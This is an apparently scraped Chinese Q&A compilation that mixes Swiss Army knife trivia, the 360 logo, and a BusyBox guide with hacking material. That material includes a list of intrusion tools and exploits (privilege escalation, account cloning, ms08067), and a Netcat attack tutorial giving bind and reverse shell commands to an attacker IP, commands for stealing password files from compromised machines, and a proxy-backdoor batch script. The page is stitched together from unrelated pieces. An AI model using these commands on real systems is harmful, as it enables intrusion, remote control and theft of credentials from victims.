黑客工具中国菜刀_黑客软件瑞士军刀的作用

hacker|
287

黑客攻击别人是怎么个攻击法?

大多不是!

攻击大多用如下:

nc瑞士军刀,mt用于提权,psu.exe用于克隆帐号,

x-scan扫描弱口令,Superscan用于扫描端口,流光(综合扫描工具)

lcx端口转发

windows系统自带IPC$ telnet

还有溢出工具,比如现在的ms08067.exe针对最新微软rpc漏洞

瑞士军刀的发明是属于什么的应用

瑞士军刀厂商很低调,很少见到他们宣传自己的设计理念,我估计他们是用产品无声地诠释自己的设计理念——要用户自己领悟,用事实说话。我在把玩瑞士军刀的过程中,终于有所领悟它的设计理念,写出来与大家交流一下。

1.物尽其才,因才而用,恰到好处。瑞士军刀的用料很讲究,好刀用在刀刃上,刀刃要锋利,就用好钢材,钼铬合金钢的,既锋利耐用,又不易生锈。效果确实不错。其他的组件成分也有差别,硬度也不一样,满足不同的使用性能。隔板部分则用重量很轻的铝合金,柄材用赛璐珞,这样成本低,重量轻,方便携带。

2.组合式设计,功能多变,满足不同用户的需要。根据消费群体的不同需要,对产品进行细分,个性化设计。主刀,小刀,开瓶器,开罐器都是所有消费者需要的,属于公共部分,几乎所有的瑞士军刀都有这些配件。其他如剪刀,木锯,钢锉,钳子等则是个性化部分,不同的消费者有不同的需要,因此瑞士军刀就进行了细分,组合出了丰富多彩的不同型号的瑞士军刀。所以受到了社会各阶层的欢迎。

3.功能齐全,配件众多,符合动作节约原则。人们要修理一件物品,最怕的就是因为工具不全而耽误了宝贵的时间,有时候寻找工具所需要的时间甚至要大于修理所用的时间。而瑞士军刀恰好就解决了这个问题。一把功能齐全的瑞士军刀具有修理物品所需要的所有工具,能够让用户在最短的时间内完成修理工作,解决问题,从而节约了时间,提高了效率。

4.尺寸长短搭配,能够规避各国的刀具管制条例,让用户合法持有。瑞士军刀在设计规格上,尺寸长短搭配,有58MM,74MM,84MM,91MM,111MM等多种长度规格型号,可以根据不同国家对于管制刀具的要求,方便用户自己选择合法的瑞士军刀购买使用,从而让瑞士军刀无障碍的达到用户手中,风行天下。

由此我得出一个结论:任何世界名牌都一定有他成为名牌的理由,不会是偶然成功的。我所领悟的瑞士军刀的设计理念与瑞士人对于质量精益求精的追求,也许就是瑞士军刀成为世界名牌,而且长盛不衰的原因。

为什么360防火墙和瑞士军刀的标志一样的?

瑞士人Karl Elsener在瑞士军刀的红色握把上刻白色十字盾牌来做商标,并以母亲之名Victoria来命名这个产品,创立了Victorinox(维氏),现在市场上卖的大多是这种牌子的,另外,另一家向瑞士军方供应瑞士军刀的公司是Wenger(威戈),他的商标是长方形里面是十字。

至于360的标志,是一个十字军的盾牌标志,表示防御牛B,你可以认为有剽窃之嫌,另外,老兄你的问题蛮无聊的!

安卓 busybox 是做什么的,怎么用?

BusyBox 是一个集成了一百多个最常用linux命令和工具的软件。BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。有些人将 BusyBox 称为 Linux 工具里的瑞士军刀。简单的说BusyBox就好像是个大工具箱,它集成压缩了 Linux 的许多工具和命令,也包含了 Android 系统的自带的shell。

1、简介

BusyBox 将许多具有共性的小版本的UNIX工具结合到一个单一的可执行文件。这样的集合可以替代大部分常用工具比如的GNU fileutils , shellutils等工具,BusyBox提供了一个比较完善的环境,可以适用于任何小的嵌入式系统。

2、发源

BusyBox 最初是由 Bruce Perens 在 1996 年为Debian GNU/Linux安装盘编写的。其目标是在一张软盘上创建一个可引导的 GNU/Linux 系统,这可以用作安装盘和急救盘。

3、编译安装

#make

#make install

编译好后在busybox目录下生成子目录_install,里面的内容:

drwxr-xr-x 2 root root 4096 11月 24 15:28 bin

rwxrwxrwx 1 root root 11 11月 24 15:28linuxrc - bin/busybox

drwxr-xr-x 2 root root 4096 11月 24 15:28 sbin

其中可执行文件busybox在需要制作文件系统映像烧入板子的情况下,busybox应放在根文件系统目录下的bin中,其他的都是指向他的符号链接.

4、、配置

busybox的配置程序和linux内核菜单配置方式简直一模一样.熟悉用make menuconfig方式配置linux内核的朋友很容易上手.

#cp busybox-1.00.tar.gz /babylinux

#cd /babylinux

#tar xvfz busybox-1.00.tar.gz

#cd busybox-1.00

#make menuconfig

下面是需要编译进busybox的功能选项。

General Configuration应该选的选项

Show verbose applet usage messages

Runtime SUID/SGID configuration via /etc/busybox.conf

Build Options

Build BusyBox as a static binary (no shared libs)

这个选项是一定要选择的,这样才能把busybox编译成静态链接的可执行文件,运行时才独立于其他函数库.否则必需要其他库文件才能运行,在单一个linux内核不能使它正常工作.

Installation Options

Don't use /usr

这个选项也一定要选,否则make install 后busybox将安装在原系统的/usr下,这将覆盖掉系统原有的命令.选择这个选项后,make install后会在busybox目录下生成一个叫_install的目录,里面有busybox和指向它的链接.

其它选项都是一些linux基本命令选项,自己需要哪些命令就编译进去,一般用默认的就可以了,配置好后退出并保存。

5、使用技巧

可以这样用busybox

#busybox ls

他的功能就相当运行ls命令

最常用的用法是建立指向busybox的链接,不同的链接名完成不同的功能.

#ln -s busybox ls

#ln -s busybox rm

#ln -s busybox mkdir

然后分别运行这三个链接:

#./ls

#./rm

#./mkdir

就可以分别完成了ls rm 和mkdir命令的功能.虽然他们都指向同一个可执行程序busybox,但是只要链接名不同,完成的功能就不同,很多linux网站都提供busybox的源代码下载。

请教瑞士军刀的功能!!

你说的那个上面有小孔的小刀是锥子,可以在孔里穿上线,然后再用锥子扎漏你想用线穿过的东西,比如皮革啥的,这样就把线带过去了。

补充的 :

1、那两个东西就是一个镊子一个牙签

2、翻译过来就是 VICTORINOX威氏 SWITZERLAND瑞士 STAINLESS不锈钢 那个rostfrei我也不知道啥意思 嘿嘿

3、officier suisse 这个意思大概是军官刀的意思,不是型号

camping是系列 吧 野营系列 我记得刀的盒子里好像有型号 你自己看看吧

另外 不同的型号 上面的工具次序也不一样,你说在钻木塞器旁边的那个小刀 呵呵 ,别人的刀子可能不是一样的,那样就帮不了你了 。

求各种恶搞软件,不要病毒哦

######################################################################

NC这个黑客必备的武器,被称为”瑞士军刀”可见功能之强大.

对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.

1.1 NC.EXE是一个非标准的telnet客户端程序,

1.2 还有一个putty.exe客户端程序,提供四种连接模式

-raw -telnet -rlogin -ssh.

虽然现在也新出了GUI版的中文“NC”,但是相比起来还是这个好用。

######################################################################

2. Netcat 1.10 for NT 帮助信息

######################################################################

C:\WINDOWS\Desktopnc -h

[v1.10 NT]

connect to somewhere: nc [-options] hostname port[s] [ports] ...

listen for inbound: nc -l -p port [options] [hostname] [port]

options:

-d detach from console, background mode (后台模式)

-e prog inbound program to exec [dangerous!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h this cruft (本帮助信息)

-i secs delay interval for lines sent, ports scanned (延迟时间)

-l listen mode, for inbound connects (监听模式,等待连接)

-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)

-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)

-o file hex dump of traffic (十六进制模式输出文件,三段)

-p port local port number (本地端口)

-r randomize local and remote ports (随机本地远程端口)

-s addr local source address (本地源地址)

-t answer TELNET negotiation

-u UDP mode

-v verbose [use twice to be more verbose] (-vv 更多信息)

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning] (扫描模式,-vv)

port numbers can be individual or ranges: m-n [inclusive] 3. Netcat 1.10 常用的命令格式

######################################################################

3.1.端口的刺探:

nc -vv ip port

RIVER [192.168.0.198] 19190 (?) open //显示是否开放open

3.2.扫描器

nc -vv -w 5 ip port-port port

nc -vv -z ip port-port port

这样扫描会留下大量的痕迹,系统管理员会额外小心

3.3. 后门

victim machine: //受害者的机器

nc -l -p port -e cmd.exe //win2000

nc -l -p port -e /bin/sh //unix,linux

attacker machine: //攻击者的机器.

nc ip -p port //连接victim_IP,然后得到一个shell。

3.4.反向连接

attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.

//或者wollf的反向连接.

nc -vv -l -p port

victim machine:

nc -e cmd.exe attacker ip -p port

nc -e /bin/sh attacker ip -p port

或者:

attacker machine:

nc -vv -l -p port1 /*用于输入*/

nc -vv -l -p prot2 /*用于显示*/

victim machine:

nc attacker_ip port1   cmd.exe   nc attacker_ip port2

nc attacker_ip port1   /bin/sh   nc attacker_ip port2

139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)

这样就可以保证nc.exe优先于NETBIOS。 3.5.传送文件:

3.5.1 attacker machine -- victim machine //从肉鸡拖密码文件回来.

nc -d -l -p port path\filedest   /*attacker machine*/ 可以shell执行

nc -vv attacker_ip port path\file.txt /*victim machine*/ 需要Ctrl+C退出

//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

3.5.2 attacker machine -- victim machine //上传命令文件到肉鸡

nc -vv -l -p port path\file.txt  /*victim machine*/ 需要Ctrl+C退出

nc -d victim_ip port path\filedest   /*attacker machine*/ 可以shell执行

//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

结论: 可以传输ascii,bin文件.可以传输程序文件.

问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .

或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?

3.6 端口数据抓包.

nc -vv -w 2 -o test.txt 80 21-15

00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error

00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr

00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...

00000084 83 00 00 01 8f # .....

3.7 telnet,自动批处理。

nc victim_ip port path\file.cmd   /*victim machine*/ 显示执行过程.

nc -vv victim_ip port path\file.cmd   /*victim machine*/ 显示执行过程.

nc -d victim_ip port path\file.cmd 安静模式.

_______________file.cmd________________________

password

cd %windir%

echo []=[%windir%]

c:

cd \

md test

cd /d %windir%\system32\

net stop sksockserver

snake.exe -config port 11111

net start sksockserver

exit

2 )DameWare Mini Remote Control 是一款功能强大的windows远程控制软件。只要拥有远程主机的一个有权限的帐号,就可以控制远程主机。这个软件在中安网培有最新的汉化版()

配置方法:

配置这个很简单,我们来看一下。点击“查看”菜单中的“属性”打开“default host 属性”窗口,选择“安装选项”,点击“编辑”来配置其属性。

在“DameWare米你远程控制属性”窗口的“常规”页中,提供了三种远程登陆验证类型,对于windows98/me只能使用“proprietary challenge/response”验证机制,需要你设置好用户id和密码。至于“windows nt challenge/response”和“加密的(128-bit)windows logon”要求控制者拥有对方主机的帐户和密码。在此可以设置端口和连接超时。

0条大神的评论

发表评论